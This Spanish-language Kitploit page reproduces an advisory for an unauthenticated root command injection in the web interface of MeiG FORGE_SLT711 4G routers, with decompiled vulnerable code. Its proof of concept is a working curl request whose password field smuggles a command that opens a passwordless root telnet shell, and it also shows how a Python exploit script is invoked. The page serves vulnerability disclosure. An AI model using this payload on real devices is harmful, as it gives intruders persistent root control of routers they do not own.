Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-36356 — CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - Inyección de comandos del sistema operativo sin autenticación (RCE como root) | Kitploit
Herramientas/GitHubGitHub/totekuh/cve-2026-36356
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlDesarrollo de Payloads
GitHubtotekuh/cve-2026-36356

CVE-2026-36356

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead - Inyección de comandos del sistema operativo sin autenticación (RCE como root)

Ver Repositorio
1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-36356: MeiG Smart FORGE_SLT711 GoAhead — Inyección de comandos del sistema operativo sin autenticación (/action/SetRemoteAccessCfg)

  • CVE: CVE-2026-36356
  • CWE: CWE-78, CWE-306
  • Descubridor: Daniil Gordeev
  • Divulgado: 2026-05-03

Resumen

El servidor web GoAhead incluido con los dispositivos CPE 4G LTE MeiG Smart FORGE_SLT711 expone un endpoint HTTP sin autenticación, /action/SetRemoteAccessCfg, que interpola entrada JSON controlada por el usuario en un comando shell sin saneamiento. Una única solicitud POST sin autenticación ejecuta comandos arbitrarios como root. Dos causas raíz independientes: falta una entrada de ruta de autenticación y una construcción insegura sprintf() → system() en el controlador.

Productos afectados

  • Fabricante: MeiG Smart Technology Co., Ltd. (Shenzhen, China)
  • Producto: Router CPE 4G LTE FORGE_SLT711
  • Firmware confirmado: MDM9607.LE.1.0-00110-STD.PROD-1 (firmware del módem BC-MGST711H_1.1.1_EQ101)
  • Servidor web: GoAhead 3.x (Embedthis) con manejadores de acción personalizados de MeiG (/usr/bin/goahead)

El código vulnerable está en el manejador de acción personalizado de MeiG, no en GoAhead original. Es probable que otras versiones de firmware de esta línea de productos estén afectadas; no verificado de forma independiente.

Entorno de prueba

DispositivoOrtel 4G LTE CPE (OEM: MeiG FORGE_SLT711)
SoCQualcomm MDM9607, ARMv7 Cortex-A7
KernelLinux 3.18.48
FirmwareMDM9607.LE.1.0-00110-STD.PROD-1
Fecha

Detalles técnicos

Falta de autenticación (CWE-306)

La configuración de rutas de GoAhead /var/www/route.txt enumera rutas autenticadas (líneas 64–150) usando auth=basic. /action/SetRemoteAccessCfg no está en esta lista. El enrutamiento cae en la ruta comodín (catch-all) en la línea 156:

root@kitploit:~
route uri=/action handler=action

La ruta comodín no tiene auth=basic, por lo que cualquier cliente HTTP puede invocar /action/SetRemoteAccessCfg sin credenciales.

Inyección de comandos (CWE-78)

El manejador en el offset 0x0003c6d8 de /usr/bin/goahead se descompila a:

root@kitploit:~
char password_buf[64];      // 0x40 bytes on stack
char command_buf[256];      // 0x100 bytes on stack

websGetJsonItemValue(json, "password", STRING, password_buf, 0x40);
sprintf(command_buf, "echo root:\"%s\"|chpasswd", password_buf);
system(command_buf);

El campo password se interpola entre comillas dobles. La sustitución $(...) y las comillas invertidas `...` se expanden dentro de comillas dobles, por lo que un atacante controla el comando shell. system() se ejecuta como uid=0 porque el proceso GoAhead se ejecuta como root. Sin validación de entrada, sin escape, sin lista blanca de caracteres.

Prueba de concepto

Puerta trasera telnet persistente

root@kitploit:~
curl -s -X POST http://192.168.1.1/action/SetRemoteAccessCfg \
  -H "Content-Type: application/json" \
  -d '{"password":"$(telnetd -l /bin/sh -p 2323 &)"}'
# Reachable via: telnet 192.168.1.1 2323 (root shell, no password)

RCE sin autenticación → shell root en un MeiG FORGE_SLT711 (Ortel 4G LTE CPE) mediante /action/SetRemoteAccessCfg

Exploit de referencia en Python

poc_rce.py (publicado junto con este aviso):

root@kitploit:~
python3 poc_rce.py --ip 192.168.1.1 --cmd 'id > /tmp/out'

La explotación es ciega: la salida del comando no está en la respuesta HTTP.

Restricciones del payload

  • Búfer password: 64 bytes
  • Búfer final de comando: 256 bytes
Descargar herramienta
2026-02-21